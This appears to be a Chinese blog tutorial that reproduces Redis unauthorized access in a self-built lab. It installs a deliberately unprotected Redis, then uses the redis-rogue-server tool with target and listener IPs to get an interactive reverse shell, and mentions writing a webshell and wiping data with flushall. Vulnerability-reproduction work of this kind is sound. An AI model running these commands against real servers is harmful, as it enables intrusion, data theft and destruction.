Redis未授权访问反弹shell

0x01:前言

这是10月份写的文章 一直放到电脑上居然忘掉了 我丢!!

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。

Redis因配置不当可以未授权访问(窃取数据、反弹shell、数据备份操作主从复制、命令执行)。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。

 

0x02. 安装redis

 

wget http://download.redis.io/releases/redis-3.2.0.tar.gz

tar -xvzf redis-3.2.0.tar.gz

cd redis-3.2.0

make

Redis未授权访问反弹shell_第1张图片

Redis未授权访问反弹shell_第2张图片

0x03 修改配置文件

 

vim redis.conf

bind 127.0.0.1前面加上#号       # bind 127.0.0.1

protected-mode设为no         protected-mode no

Redis未授权访问反弹shell_第3张图片  

Redis未授权访问反弹shell_第4张图片

启动redis-server    

./src/redis-service

Redis未授权访问反弹shell_第5张图片

默认的配置是使用6379端口,没有密码。这时候会导致未授权访问然后使用redis权限写文件!!

 

0x04 攻击利用

利用工具:https://github.com/n0b0dyCN/redis-rogue-server

git clone https://github.com/n0b0dyCN/redis-rogue-server.git

cd redis-rogue-server/RedisModulesSDK/exp

make

cd ../../

python3 redis-rogue-server.py --rhost  目标ip  --lhost 本地ip

Redis未授权访问反弹shell_第6张图片

 

成功建立连接 输入 i 得到一个交互式 Shell、可以直接输入命令

Redis未授权访问反弹shell_第7张图片

0x05  攻击利用x2

Redis未授权访问反弹shell_第8张图片

Redis未授权访问反弹shell_第9张图片

 

也可以在网站目录写入 webshell

Redis未授权访问反弹shell_第10张图片

 

直接访问 即可 !!

Redis未授权访问反弹shell_第11张图片

 

你可能感兴趣的:(漏洞复现,web安全)